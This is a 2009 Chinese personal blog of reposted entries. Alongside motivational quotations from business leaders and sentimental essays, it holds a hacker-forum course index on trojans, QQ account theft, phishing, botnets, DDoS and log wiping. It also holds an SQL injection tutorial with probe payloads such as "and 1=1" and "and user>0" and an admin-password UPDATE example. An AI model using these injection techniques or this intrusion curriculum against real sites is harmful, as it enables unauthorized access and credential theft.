人累了心碎了

【置订】我的心随天气,画上冻结的记号.不要让它沉下去

475562898@qq.com(人累了心碎了) — Thu, 19 Nov 2009 12:57:01 GMT

受够了别人用钱来衡量朋友的标准,受够了没钱自己的天赋被埋没,受够了没钱的白眼,终于决定把心冻起来. 我等着伯乐到到来,我等着知心朋友的出现,我等着那个能为我解冻的人, 你还很遥远吗? 把心冻结,恨心的人们,等来解冻的你,......

【置订】我的心随天气,画上冻结的记号.不要让它沉下去

475562898@qq.com(人累了心碎了) — Thu, 19 Nov 2009 12:56:46 GMT

网络成功人士语录，你看了没？

475562898@qq.com(人累了心碎了) — Thu, 19 Nov 2009 08:16:44 GMT

俞敏洪经典语录:

１．女人如果因为觉得一个男生帅就跟嫁给他，这是好色；男生因为女生漂亮而娶她，是审美。
２.为什么你不要自傲和自卑？
你可以说自己是最好的，但不能说自己是全校最好的、全北京最好的、全国最好的、全世界最好的，所以你不必自傲；同样，你可以说自己是班级最差的，但你能证明自己是全校最差的吗？能证明自己是全国最差的吗？所以不必自卑。
３.年纪大了，人们看重不再是外表，不是你帅不帅，而是看你的内心的魅力：你的气魄、气概。
４.这个世界上有很多天才，天才是用来欣赏的，不是用来攀比的。
５.你说我是猪，不对，其实我连猪都不如。
很多人失去了快乐，是因为他太敏感了。别人一句话、一个评论就使自己生气一个月。这时非常无聊的。严重了就成了马家爵，因为别人不请自己吃饭就郁闷地要杀人。
６.要每天多努力一些，比别人多努力一个小时。
７.使这个世界灿烂的不是阳光，而是女生的微笑。
8. 要引人敬意，就要研究一个非常专业的领域，在那个领域中，你是最顶尖的，至少是中国钱10名，这样无论任何时候你都有话说，有事情可作。我俞敏洪原来想成为中国研究英语的前100名，但后来发现根本不可能。所以我就背单词，用1年的时间背诵了一本英文词典，成为中国单词专家，现在我出版的红宝书系列：从初中到GRE词汇有十几本，年销量100万册，稿费比我正式工作都高的多。
9.大学生应该做的事情是：
（1）专业方面，成为中国前100名；
（2）人文方面，读500本书。
（3）英语。
10.如果你要引人注目，就要使得自己成为一棵树，傲立于大地之间；而不是做一颗草，你见过谁踩了一棵草，还抱歉地对草说：对不起？
11．学英语好比学鸟叫，你在树林里学鸟叫，当有四只鸟落在你肩上时，说明你过了英语四级，当有六只鸟落在你肩上时，说明你过了英语六级，当有许多鸟落在你肩上，说明你成了鸟人。
12．女人的温柔和男人的成就是成正比的。
13、俞敏洪在《赢在中国》点评语录
蜗牛的壳是自己加上的。
既靠天，也靠地，还靠自己。
心平气和地接受失败。
做人要大方、大气，不放弃！
世界上没有绝对的公平，公平只在一个点上。
心中平，世界才会平。
学会给别人机会。
名次和荣誉，就像天上的云，不能躺进去，躺进去就跌下来了。名次和荣誉其实是道美丽的风景，只能欣赏。
只要出于同情心和面子做的事，几乎都会失败。
每条河流都有一个梦想：奔向大海。长江、黄河都奔向了大海，方式不一样。长江劈山开路，黄河迂回曲折，轨迹不一样。但都有一种水的精神。水在奔流的过程中，如果沉淀于泥沙，就永远见不到阳光了。
14、俞敏洪：人要像树一样活着
于《赢在中国》第三赛季36进12现场演讲
人的生活方式有两种，
第一种方式是像草一样活着，
你尽管活着，每年还在成长，
但是你毕竟是一棵草，
你吸收雨露阳光，
但是长不大。
人们可以踩过你，
但是人们不会因为你的痛苦，而他产生痛苦；
人们不会因为你被踩了，而来怜悯你，
因为人们本身就没有看到你。
所以我们每一个人，
都应该像树一样的成长，
即使我们现在什么都不是，
但是只要你有树的种子，
即使你被踩到泥土中间，
你依然能够吸收泥土的养分，
自己成长起来。
当你长成参天大树以后，
遥远的地方，人们就能看到你；
走近你，你能给人一片绿色。
活着是美丽的风景，
死了依然是栋梁之才，
活着死了都有用。
这就是我们每一个同学做人的标准和成长的标准。
马云经典语录：

1.当你成功的时候，你说的所有话都是真理。
2.我永远相信只要永不放弃，我们还是有机会的。最后，我们还是坚信一点，这世界上只要有梦想，只要不断努力，只要不断学习，不管你长得如何，不管是这样，还是那样，男人的长相往往和他的的才华成反比。今天很残酷，明天更残酷，后天很美好，但绝对大部分是死在明天晚上，所以每个人不要放弃今天。
3.孙正义跟我有同一个观点，一个方案是一流的Idea加三流的实施；另外一个方案，一流的实施加三流的Idea，哪个好？我们俩同时选择一流的实施，三流的Idea。
4.我既要扔鞭炮，又要扔炸弹。扔鞭炮是为了吸引别人的注意，迷惑敌人；扔炸弹才是我真正的目的。不过，我可不会告诉你我什么时候扔鞭炮，什么时候扔炸弹。游戏就是要虚虚实实，这样才开心。如果你在游戏中感到很痛苦，那说明你的玩法选错了。
5.“其实，有的时候人的最大问题就在于他说的都是对的” 。
6.那些私下忠告我们，指出我们错误的人，才是真正的朋友。
7.我生平最高兴的，就是我答应帮助人家去做的事，自己不仅是完成了，而且比他们要求的做得更好，当完成这些信诺时，那种兴奋的感觉是难以形容的……
8.注重自己的名声，努力工作、与人为善、遵守诺言，这样对你们的事业非常有帮助。
9. 商业合作必须有三大前提:一是双方必须有可以合作的利益，二是必须有可以合作的意愿，三是双方必须有共享共荣的打算。此三者缺一不可。
10.服务是全世界最贵的产品，所以最佳的服务就是不要服务，最好的服务就是不需要服务.
11.永远不要跟别人比幸运，我从来没想过我比别人幸运，我也许比他们更有毅力，在最困难的时候，他们熬不住了，我可以多熬一秒钟、两秒钟。
12.今天到北大演讲心里特别激动。我一直把北大的学子当做我的偶像，一直考却考不进，所以我想如果有一天我一定要到北大当老师。
13.看见10只兔子，你到底抓哪一只？有些人一会儿抓这个兔子，一会儿抓那个兔子，最后可能一只也抓不住。CEO的主要任务不是寻找机会而是对机会说NO。机会太多，只能抓一个。我只能抓一只兔子，抓多了，什么都会丢掉.
14.我们公司是每半年一次评估，评下来，虽然你的工作很努力，也很出色，但你就是最后一个，非常对不起，你就得离开。
15.我们与竞争对手最大的区别就是我们知道他们要做什么，而他们不知道我们想做什么。我们想做什么，没有必要让所有人知道。
16.网络上面就一句话，光脚的永远不怕穿鞋的。
17.中国电子商务的人必须要站起来走路，而不是老是手拉手，老是手拉着手要完蛋。我是说阿里巴巴发现了金矿，那我们绝对不自己去挖，我们希望别人去挖，他挖了金矿给我一块就可以了。
18.我深信不疑我们的模式会赚钱的，亚马逊是世界上最长的河，8848是世界上最高的山，阿里巴巴是世界上最富有的宝藏。一个好的企业靠输血是活不久的，关键是自己造血。
19.我为什么能活下来？第一是由于我没有钱，第二是我对INTERNET一点不懂，第三是我想得像傻瓜一样。
20.发令枪一响，你是没时间看你的对手是怎么跑的。只有明天是我们的竞争对手。
21.如果早起的那只鸟没有吃到虫子，那就会被别的鸟吃掉。
22.听说过捕龙虾富的，没听说过捕鲸富的。
23.好的东西往往都是很难描述的。
24.在我看来有三种人，生意人：创造钱;商人：有所为，有所不为。企业家：为社会承担责任。企业家应该为社会创造环境。企业家必须要有创新的精神。
25.一个公司在两种情况下最容易犯错误，第一是有太多的钱的时候，第二是面对太多的机会，一个ＣＥＯ看到的不应该是机会，因为机会无处不在，一个ＣＥＯ更应该看到灾难，并把灾难扼杀在摇篮里。

牛根生经典语录：

1.小胜凭智，大胜靠德。
2.有干劲，你就洒下汗水；有知识，你就献出智慧；二者都不具备，请你让出岗位。
3.城市多喝一杯奶，农村致富一家人。
4.财散人聚，财聚人散。
5.一个产品，抓眼球，揪耳朵，都不如暖人心。
6.一个人智力有问题，是次品；一个人的灵魂有问题，就是危险品。经营人心就是经营事业。
7.好心态才有好状态。
8.帮助别人，但不伤害别人。
9.要想知道，打个颠倒。
10.从无到有，是件快乐的事。而从有到无，同样是种快感。
11.产品市场是亿万公民，资本市场是千万股民，原料市场是百万农民。
12.让认识你的人受益，还不能算好；让不认识你的人也受益，那才是真好。
13.吃亏吃到再也吃不进的时候，就不会吃亏了。苦多了，甜就大了。
14.想赢个三回两回，三年五年，有点智商就行；想做个百年老店，想一辈子赢，没有德商绝对不行。
15.学得辛苦，做得舒服；学得舒服，做得辛苦。
16.产品等于人品，质量就是生命。
17.看别人不顺眼，首先是自己修养不够。
18.从最不满意的客户身上，学到的东西最多。
19.管理是严肃的爱。
20.经营企业就是经营人心。
21.人不能把金钱带入坟墓，但金钱却可以把人带入坟墓。
22.一个人快乐不是因为他拥有得多，而是因为计较得少。
23.一个事业能不能成功，关键靠制度设计。
24.别人从零起步，而我从负数起步。
25.听不到奉承的人是一种幸运，听不到批评的人却是一种危险。
26.善待每一头牛，因为它们都是母亲。
27.布局决定结局。
28.世界上还有很多事情，只要你把它做透了，做成专家，你就能够为自己创造成功的机会。
29.会说话的产品卖得快，哑巴产品走得慢。
30.你如果拿五分的力量跟别人较劲，别人会拿出十二分的力量跟你较劲。

史玉柱经典语录：

1.90%的困难你现在想都没有想到，你都不知道那是困难。
2。团队核心成员有人要提出辞职时，不要挽留，既然提出了，他迟早是要走的。
3。如果没有价格上的优势与技术上的绝对优势，千万不要进入红海市场，否则你会必输无疑！
4。做连锁经营业务，一定要做一套傻瓜版的营销手册与管理手册，只有这样，才能实现远距离的管理。
5。做成功一个店之后离你大的成功就不远了，所以你首先就是脚踏实地、集中精力地先做出一家，也是要放弃掉连锁的这种，不要在将来如何做连锁方面做太多的梦，先脚踏实地做出第一家。
6。做全国性市场，一定要先做一个试销市场，要一点点来，快不得；做成了，真到做全国市场时，要快半步，慢不得！
7。初中水平跟博士后没啥区别。只要能干就行，我一直是这个观点，不在乎学历，只要能干能做出贡献就行。
8。作为我们曾经失败过，至少有过失败经历的人，应该经常从里面学点东西。人在成功的时候是学不到东西的，人在顺境的时候，在成功的时候，沉不下心来，总结的东西自然是很虚的东西。只有失败的时候，总结的教训才是深刻的，才是真的。
9.对过去成功的经验再好好总结总结，尤其是对失败的教训，下半夜夜深人静的时候你仔细想一想。反正睡觉也想，想一想实际上对你有很大收获比你看书更有用。因为有的书离你远，那是看自己过去写的东西。
10。最痛苦的时候，压力最大的时候，脑子里面只有一件事儿的时候，我把全国分公司经理招到荒山脚下北大门那个地方，招待所里面，然后在那个地方闭门开批判会。大家批判我，批判了三天三夜，我觉得那个就很有用。
11。要改变消费者固有的想法，比登太阳还难；但不是不可能的。
12。现在的时代，战略正确之后细节决定因素，有很多细节处理不好，你的战略正确了也会失败。
13。不要只看塔尖，二三线市场比一线的更大。
14。管理无情，人有情。
15。所谓人才，就是你交给他一件事情，他做成了；你再交给他一件事情，他又做成了。

[转]华夏黑客联盟成立二周年大型免费培训教程

475562898@qq.com(人累了心碎了) — Tue, 17 Nov 2009 14:54:59 GMT

菜鸟基础班
讲师：阳光
*************************************************
第一课超速黑客安全学习法总结
http://www.hx95.com/20081115/hxhack01.rar
第二课手工关闭被黑客扫描端口
http://www.hx95.com/20081115/hxhack02.rar
第三课杀毒软件安装和配置设置
http://www.hx95.com/20081115/hxhack03.rar
第四课防火墙的安装和配置应用
http://www.hx95.com/20081115/hxhack04.rar
第五课黑客必用虚拟机安装教程
http://www.hx95.com/20081115/hxhack05.rar
第六课黑客常见DOS学习并掌握
http://www.hx95.com/20081115/hxhack06.rar
第七课：网马制作与防御中马专题
http://www.hx95.com/20081115/hxhack07.rar
第八课菜鸟学习VPN代理隐藏自己
http://www.hx95.com/20081115/hxhack08.rar
第九课服务器建立隐藏帐号与查找隐藏帐号
http://www.hx95.com/20081115/hxhack09.rar
第十课 QQ盗号与防盗专题
http://www.hx95.com/20081115/hxhack10.rar
第十一课 QQ制作钓鱼网站盗与御专题
http://www.hx95.com/20081115/hxhack11.rar
第十二课软件捆绑木马与反捆绑技术
http://www.hx95.com/20081115/hxhack12.rar
第十三课上兴远控专题（配置，使用)
http://www.hx95.com/20081115/hxhack13.rar
第十四课上兴远控专题内网篇-路由上线
http://www.hx95.com/20081115/hxhack14.rar
第十五课网页插入隐藏后门
http://www.hx95.com/20081115/hxhack15.rar
第十六课 DDOS软件使用教程
http://www.hx95.com/20081115/hxhack16.rar
第十七课常见挂马技术讲解和实战演示
http://www.hx95.com/20081115/hxhack17.rar
第十八课实战3389端口入侵抓肉鸡
http://www.hx95.com/20081115/hxhack18.rar
第十九课批量135抓肉鸡工具配置使用
http://www.hx95.com/20081115/hxhack19.rar
第二十课抓4899弱口令肉鸡
http://www.hx95.com/20081115/hxhack20.rar
第二十一课 CHM木马的制作
http://www.hx95.com/20081115/hxhack21.rar
第二十二课手把手破解路由密码
http://www.hx95.com/20081115/hxhack22.rar
第二十三课制作隐蔽RM木马全攻略码
http://www.hx95.com/20081115/hxhack23.rar
第二十四课 Doc文本捆绑木马抓肉鸡演示
http://www.hx95.com/20081115/hxhack24.rar
第二十五课利用ARP欺骗获得FTP密码
http://www.hx95.com/20081115/hxhack25.rar
第二十六课终极学习rar高级捆绑技术
http://www.hx95.com/20081115/hxhack26.rar
第二十七课菜鸟制作黑客GUI版扫描器
http://www.hx95.com/20081115/hxhack27.rar
第二十八课手把手学会破解FTP密码
http://www.hx95.com/20081115/hxhack28.rar
第二十九课恢复误删文件技术-EasyRecovery
http://www.hx95.com/20081115/hxhack29.rar
第三十课手把手学习swf文件挂马技术
http://www.hx95.com/20081115/hxhack30.rar
第三十一课 VirtualPC安装使用教程
http://www.hx95.com/20081115/hxhack31.rar
第三十二课后门制作篇-IIS后门
http://www.hx95.com/20081115/hxhack32.rar
第三十三课入侵后必学-清除日志
http://www.hx95.com/20081115/hxhack33.rar
第三十四课 x-scan扫描器的使用技巧详解
http://www.hx95.com/20081115/hxhack34.rar
第三十五课端口技术综合详细讲解
http://www.hx95.com/20081115/hxhack35.rar

（请大家耐心等待更新）
*************************************************
入侵渗透提权
讲师：职业色狼
*************************************************
动力后台拿shell
http://www.hx95.com/20081115/ypde001.rar
渗透讲解教程
http://www.hx95.com/20081115/ypde002.rar
利用肉鸡建立VPN
http://www.hx95.com/20081115/ypde003.rar
利用弱口令拿服务器
http://www.hx95.com/20081115/ypde004.rar
利用install.asp拿z-blog shell
http://www.hx95.com/20081115/ypde005.rar
ms08067漏洞的利用
http://www.hx95.com/20081115/ypde006.rar
pjblog相册2.0漏洞
http://www.hx95.com/20081115/ypde007.rar
利用SA注射点拿系统
http://www.hx95.com/20081115/ypde008.rar

（请大家耐心等待更新）
*************************************************
delphi编程班
讲师：阿杰
*************************************************
delphi基础知识第一课
http://www.hx95.com/20081115/delphi01.rar
delphi基础知识第二课
http://www.hx95.com/20081115/delphi02.rar
delphi第三课-编写记事本
http://www.hx95.com/20081115/delphi03.rar
delphi第四课-编写音频视频播放器
http://www.hx95.com/20081115/delphi04.rar
delphi第五课-编写邮件发送程序
http://www.hx95.com/20081115/delphi05.rar
delphi第六课-编写IE浏览器
http://www.hx95.com/20081115/delphi06.rar
delphi第七课-编写QQ防盗登录器
http://www.hx95.com/20081115/delphi07.rar
delphi第八课-编写网络验证程序
http://www.hx95.com/20081115/delphi08.rar

（请大家耐心等待更新）

脚本入侵班
讲师：阳光
*************************************************
第一课网站入侵概述
http://www.hx95.com/20081115/jbrq01.rar
第二课常见网站入侵软件介绍和使用
http://www.hx95.com/20081115/jbrq02.rar
第三课数据库备份技术详解(实例演示)
http://www.hx95.com/20081115/jbrq03.rar
第四课抓包改包入侵网站(实例演示)
http://www.hx95.com/20081115/jbrq04.rar
第五课一句话木马2种方法入侵网站(实例演示)
http://www.hx95.com/20081115/jbrq05.rar
第六课 Cookie欺骗的简单讲解+利用实例
http://www.hx95.com/20081115/jbrq06.rar
第七课 .asp解分漏洞实战入侵
http://www.hx95.com/20081115/jbrq07.rar
第八课旁注入侵思路及条件
http://www.hx95.com/20081115/jbrq08.rar
第九课啊D+google获得大量注入点
http://www.hx95.com/20081115/jbrq09.rar
第十课数据库恢复技术入侵网站
http://www.hx95.com/20081115/jbrq10.rar
第十一课 ewebeditor编辑器漏洞入侵
http://www.hx95.com/20081115/jbrq11.rar
第十二课巧妙利用漏洞入侵科讯网站
http://www.hx95.com/20081115/jbrq12.rar

（请大家耐心等待更新）

提权入侵班
讲师：阳光
*************************************************
第一课提权概述
http://www.hx95.com/20081115/tqrq01.rar
第二课 serv-u服务器提权（目录无修改权限）
http://www.hx95.com/20081115/tqrq02.rar
第三课 serv-u服务器提权（目录有修改权限）
http://www.hx95.com/20081115/tqrq03.rar
第四课 pcanywhere提权方法
http://www.hx95.com/20081115/tqrq04.rar
第五课 FlashFXP替换文件提权
http://www.hx95.com/20081115/tqrq05.rar
第六课 VNC密码破解提权
http://www.hx95.com/20081115/tqrq06.rar
第七课 CAIN 嗅探3389密码提权
http://www.hx95.com/20081115/tqrq07.rar
第八课替换服务提权
http://www.hx95.com/20081115/tqrq08.rar
第九课利用HASH破解提权
http://www.hx95.com/20081115/tqrq09.rar
第十课启动项提权
http://www.hx95.com/20081115/tqrq10.rar
第十一课 CAcls命令在提权中的使用
http://www.hx95.com/20081115/tqrq11.rar
第十二课 Windows-2003-webshell默认权限
http://www.hx95.com/20081115/tqrq12.rar
第十三课 Windows 2003服务器默认文件夹权限
http://www.hx95.com/20081115/tqrq13.rar
第十四课利用perl提升权限
http://www.hx95.com/20081115/tqrq14.rar
第十五课端口映射解决内网提权
http://www.hx95.com/20081115/tqrq15.rar

（以上课程正在准备中，请大家耐心等待更新）

（欢迎大家提出宝贵的意见和建议，论坛有菜鸟和高手，教程也会分基础和技术含量的，教程将会不断更新中，请大家及时观注此贴，感谢大家的支持！）

谨以此系列教程献给所有热爱华夏黑客联盟，爱祖国，爱和平的中国人民！

教程正在紧张开发当中，将陆续上架，由于水平有限，有不到之处还请大家多多包涵！

再次感谢您对华夏黑客联盟的支持。希望您一如既往地支持我们，并提出宝贵的意见和建议。

总之，千言万语化成一句话，为了祖国的明天，让我们共同努力吧！

论坛是在大家的关心呵护下成长的，是大家共同努力的结晶。
那么还是那句精典的话，祝华夏黑客联盟“明天会更好”！
感谢坛友们二年来对<华夏黑客联盟>的支持，再次说一声谢谢。

[转]华夏黑客联盟成立二周年大型免费培训教程

475562898@qq.com(人累了心碎了) — Tue, 17 Nov 2009 14:52:09 GMT

[转]你知道8023是什么意思吗？

475562898@qq.com(人累了心碎了) — Tue, 17 Nov 2009 06:01:25 GMT

一个男孩默默地喜欢着一个女孩，只因为那个女孩说：我们当朋友吧！他就不在说爱，只是一次又一次的说着8023。女孩渐渐的喜欢上了男孩，她讨厌男孩一次又一次的说着，我们是朋友，她希望男孩能说‘爱’，可是男孩不曾提起。只因一次误会，男孩彻底的把爱埋藏在心里，仍然发着短信说着8023。可女孩不懂8023的意思。在情人节的那一天，女孩拒绝了一个很好的男孩，因为那个-男孩不是他。女孩一直盼着他来对她说：我爱你。可惜他没来！女孩很伤心，不能怪女孩说要当朋友，因为他们彼此陌生，不能怪女孩不守承诺，只因了解所以相爱。可是男孩却遵守了一个不该遵守的承诺，以为是对错其实是错；以为是成全，其实是彼此折磨。“听说每个女孩原本是天使，是不会流泪的，只因遇到她们喜欢的男孩才落下眼泪，折断一根翅膀，跌落人间，所以，请善待你们的天使。因为她已为你而放弃了整个天堂”“听说男孩不会轻易流泪，只有遇到他们喜欢的天使，却无法弥补她们一根平衡自由的翅膀才落下眼泪，所以,请珍惜你们的护花使者，因为他是真心为你而存在。”这是有心人才能感觉到的含义，站得角度不同，所以始终错过。最终，男孩走了，和一个长得与她相似的女孩出国了，临走前他对她说了最后一句8023，女孩希望男孩留下来，望着远去的飞机她伤心的说：“为我留下来吧，我爱你！”一切都已经太迟了，8023在那时是一个解不开的谜。他曾给她写过的信里有着几句刻骨铭心的话：我有一个喜欢的女孩，不能在一起，但是我真的很爱她。心里什么东西都能放下，就是放不下她。世界上最遥远的距离，不是生离死别，而是我站在你面前，你却不知道我爱你，而是明明知道彼此相爱，却不能在一起。他们的爱情，站在世界最遥远的一头眺望。他在她面前，那时的她不懂爱。后来的日子，她开始明白爱可以是一种无偿的付出，可以是一场无尽的等待，可以是很多很多他们在一起时的美好。她懂了，他却离去了。生命里有太多我们不能掌控的结局，他们只有尝试着去忘记一些承受不起的回忆。是否，他们始终只是那两个平面上的两条平行线，沿着同一个方向走着，却永远不会有交会。是的，她爱他，这是她的劫难。一年后，男孩死了，是为情自杀；就是上边那句我喜欢的话：我喜欢悲剧，因为悲剧最真实。“8”，把左手大拇指和食指竖起，代表“L”；“0”，代表“O”；“2”，竖起食指和中指，代表“V”；“3”，竖起食指、中指、无名指，代表“E”，合起来就是“LOVE”。她终于明白8023所代表的意义了，可是太迟了，因为他已经走了。他带着对女孩的祝福走了，他说下辈子他希望两个人活着，和他爱的人在一起；女孩流着泪说：下辈子我要一个人，因为我爱的人已经死了...我不知道你看完这个故事的感觉如何，我也不知道这是否真的是一个故事，或者是一个事实，只因那个作者写的满深意的，因为他相信别人会把它当成一种故事。而我却相信它是一个事实，一个被美化了的事实。一个令人感到深刻的故事，虽不令人流泪，却可以留下很多深思的东西，却令人能感觉到它是真实爱她，就要对她说；爱她，不要让她流泪；爱她，就要让她感觉到，不要让她迟疑；爱她，就要永远的守候在她的身边，不要抛弃；爱她，就要自私一点，把她困在自己编织的情网里，使她不再逃离。爱，就要说出口，去打破那暧昧的结局；爱，就要守在她的身旁不要去天堂流浪，不要若即若离；爱，就要给她机会，让她对你说：我爱你。不要轻易的下判断，不要轻易的远离，不要以爱为名义去伤害彼此。8023很美丽，可惜它太含蓄，如果你想让她了解你的爱，请直接的说出爱，不要再玩数字游戏，因为你玩不起！爱她就不要让她受伤；爱她就不要让她一个人去流浪；爱她就不要去无她的天堂；爱她就要让她感觉到与你分享；既然爱她，就不要离开她，不要让彼此的心受伤，爱她，就让她留在你的身旁，去看夕阳。

[转]你忙吧！不打扰你了！有多少人知道这句话的意思？？

475562898@qq.com(人累了心碎了) — Sat, 14 Nov 2009 11:54:11 GMT

你忙吧！不打扰你了！有多少人知道这句话的意思？？

那你忙吧，不打扰了！
你可知道这句话的真正意思？
真的有在忙吗？
手的忙还是心的忙？
你的忙，还是我的忙？

说的人是感受到被冷落后的赌气还是识趣的退避？
听到的人会觉得心迅速低落还是如释重负的一笑？你，都有过吧？

有时候还会为彼时幼稚的猜测而情绪低落
有时会让人觉得很累

还是这句话
如果你说了
是怀着怎样的心情讲的
如果你听到了
你又会怎样去回复
可能是很平常的聊天
如果不平常也只是交流双方各自的感受

其实
当你听到这句话时
可能想不到说话人是在做最后的试探
她想要你的挽留赌上的是一个猜测
而不是你的坦然离开

如果知道你忙他又怎么会去打扰你
如果知道你忙她为什么不直接说再见
如果你们彼此了解
又怎么能不明白对方的心情
是你想要逃离
却用了她替你找的借口吧

你去忙吧我不打扰你了
如果哪一天我这样说了
请挽留我
告诉我其实你不忙
而别说
那我去忙了
可以吗
其实我不想听到你说忙
其实我希望你在忙着回我的消息
而不是空空的等待

而当你打下这些字的时候
你可能想不到她听了会觉得你在烦她
她要一个更好的理由
来结束这次的谈话
而不是你敷衍的我在忙

你去忙吧我不打扰你了
如果哪天不想跟我聊天了
请找个自己的理由合适的理由
而别说
你去忙吧
或者我在忙

请回答我不忙
或者
其实我在忙着等你的消息

主题：SQL注入漏洞原理分析

475562898@qq.com(人累了心碎了) — Sat, 14 Nov 2009 09:03:37 GMT

主题：SQL注入漏洞原理分析
内容：
1、什么是SQL注入
随着B/S模式应用开发的发展，使得使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高，程序员的水平及经验也参差不齐，相当大一部分程序员在编写代码的时候，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。攻击者可以通过互联网的输入区域，利用某些特殊构造的SQL语句插入SQL的特殊字符和指令，提交一段数据库查询代码（一般是在浏览器地址栏进行，通过正常的www端口访问），操纵执行后端的DBMS查询并获得本不为用户所知数据的技术，也就是SQL Injection（SQL注入）。
2.SQL注入简介
SQL注入是从正常的WWW端口通过对页面请求访问，而且表面看起来跟一般的Web页面访问没什么区别，所以目前市面的防火墙很少会对SQL注入发出警报，如果管理员没查看IIS日志的习惯，可能被入侵很长时间都不会发觉。
SQL注入的手法相当灵活，可以根据具体情况进行分析，构造巧妙的SQL语句，从而获取想要的数据。
现在我要告诉大家，我们一直说SQL。到底什么是SQL呢？SQL就是数据库查询语言。他是一种语言，他的作用就是用来查询数据库，简单的有select，update等等
3.SQL注入的危害性
根据国情，国内的网站用ASP+Access或SQLServer的占70%以上，PHP+MySQl占了20%，其他的不足10%。
4.原理分析
SQL注入的原理，就是从客户端提交特殊的代码，从而收集程序及服务器的信息，从而获取你想到得到的资料
http://www.xxxxx.com/showdetail.asp?id=49
数据库原型是select * from 表名 where 字段=49
http://www.xxxxx.com/showdetail.asp?id=49 and [查询语句]
数据库查询是select * from 表名 where 字段=49 and [查询语句]
4.sql注入的一般步骤
如果你以前没试过SQL注入的话，那么第一步先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。否则，不论服务器返回什么错误，IE都只显示为HTTP 500服务器错误，不能获得更多的提示信息。
测试步骤，找到asp?id=之类要查询数据库的语句
加'
加 and 1=1
加 and 1=2
5.最常用的SQL查询语句语法：
SELECT [列名]，[列名2]…… FROM [表名] WHERE [限制条件]
例：
SELECT * FROM Dv_User where UserID=1
表示查询UserID为1的所有信息。
更新：
UPDATE [表名] SET [列名]=新值 WHERE [限制条件]
例：
UPDATE Dv_User set [UserPassword]=’ 965eb72c92a549dd’ WHERE UserName=’admin’
此语句将把Dv_User表中的UserName为admin的那一行中UserPassword的值改为965eb72c92a549dd。
删除：
DELETE FROM [表名] WHERE [限制条件]
例：
DELETE FROM Dv_User WHERE UserName=’test’
将用户名为test的那一行从Dv_User表中删除

小竹SQL
随着B/S模式应用开发的发展，使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高，程序员的水平及经验也参差不齐，相当大一部分程序员在编写代码的时候，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些他想得知的数据，这就是所谓的SQL Injection，即SQL注入。
　　SQL注入是从正常的WWW端口访问，而且表面看起来跟一般的Web页面访问没什么区别，所以目前市面的防火墙都不会对SQL注入发出警报，如果管理员没查看IIS日志的习惯，可能被入侵很长时间都不会发觉。
　　但是，SQL注入的手法相当灵活，在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析，构造巧妙的SQL语句，从而成功获取想要的数据，是高手与“菜鸟”的根本区别。
　　根据国情，国内的网站用ASP+Access或SQLServer的占70%以上，PHP+MySQ占L20%，其他的不足10%。在本文，我们从分入门、进阶至高级讲解一下ASP注入的方法及技巧，PHP注入的文章由NB联盟的另一位朋友zwell撰写，希望对安全工作者和程序员都有用处。了解 ASP注入的朋友也请不要跳过入门篇，因为部分人对注入的基本判断方法还存在误区。大家准备好了吗？Let's Go...
　　入门篇
　　如果你以前没试过SQL注入的话，那么第一步先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。否则，不论服务器返回什么错误，IE都只显示为HTTP 500服务器错误，不能获得更多的提示信息。
　　第一节、SQL注入原理
　　以下我们从一个网站www.mytest.com开始（注：本文发表前已征得该站站长同意，大部分都是真实数据）。
　　在网站首页上，有名为“IE不能打开新窗口的多种解决方法”的链接，地址为：http://www.mytest.com/showdetail.asp?id=49，我们在这个地址后面加上单引号’，服务器会返回下面的错误提示：
Microsoft JET Database Engine 错误 '80040e14'
　　字符串的语法错误在查询表达式 'ID=49'' 中。
/showdetail.asp，行8
　　从这个错误提示我们能看出下面几点：
　　1. 网站使用的是Access数据库，通过JET引擎连接数据库，而不是通过ODBC。
　　2. 程序没有判断客户端提交的数据是否符合程序要求。
　　3. 该SQL语句所查询的表中有一名为ID的字段。
　　从上面的例子我们可以知道，SQL注入的原理，就是从客户端提交特殊的代码，从而收集程序及服务器的信息，从而获取你想到得到的资料。
　　第二节、判断能否进行SQL注入
　　看完第一节，有一些人会觉得：我也是经常这样测试能否注入的，这不是很简单吗？
　　其实，这并不是最好的方法，为什么呢？
　　首先，不一定每台服务器的IIS都返回具体错误提示给客户端，如果程序中加了cint(参数)之类语句的话，SQL注入是不会成功的，但服务器同样会报错，具体提示信息为处理 URL 时服务器上出错。请和系统管理员联络。
　　其次，部分对SQL注入有一点了解的程序员，认为只要把单引号过滤掉就安全了，这种情况不为少数，如果你用单引号测试，是测不到注入点的
　　那么，什么样的测试方法才是比较准确呢？答案如下：
　　① http://www.mytest.com/showdetail.asp?id=49
　　② http://www.mytest.com/showdetail.asp?id=49 ;and 1=1
　　③ http://www.mytest.com/showdetail.asp?id=49 ;and 1=2
　　这就是经典的1=1、1=2测试法了，怎么判断呢？看看上面三个网址返回的结果就知道了：
　　可以注入的表现：
　　① 正常显示（这是必然的，不然就是程序有错误了）
　　② 正常显示，内容基本与①相同
　　③ 提示BOF或EOF（程序没做任何判断时）、或提示找不到记录（判断了rs.eof时）、或显示内容为空（程序加了on error resume next）
　　不可以注入就比较容易判断了，①同样正常显示，②和③一般都会有程序定义的错误提示，或提示类型转换时出错。
　　当然，这只是传入参数是数字型的时候用的判断方法，实际应用的时候会有字符型和搜索型参数，我将在中级篇的“SQL注入一般步骤”再做分析。
　　第三节、判断数据库类型及注入方法
　　不同的数据库的函数、注入方法都是有差异的，所以在注入之前，我们还要判断一下数据库的类型。一般ASP最常搭配的数据库是Access和SQLServer，网上超过99%的网站都是其中之一。
　　怎么让程序告诉你它使用的什么数据库呢？来看看：
　　SQLServer有一些系统变量，如果服务器IIS提示没关闭，并且SQLServer返回错误提示的话，那可以直接从出错信息获取，方法如下：
　　http://www.mytest.com/showdetail.asp?id=49 ;and user>0
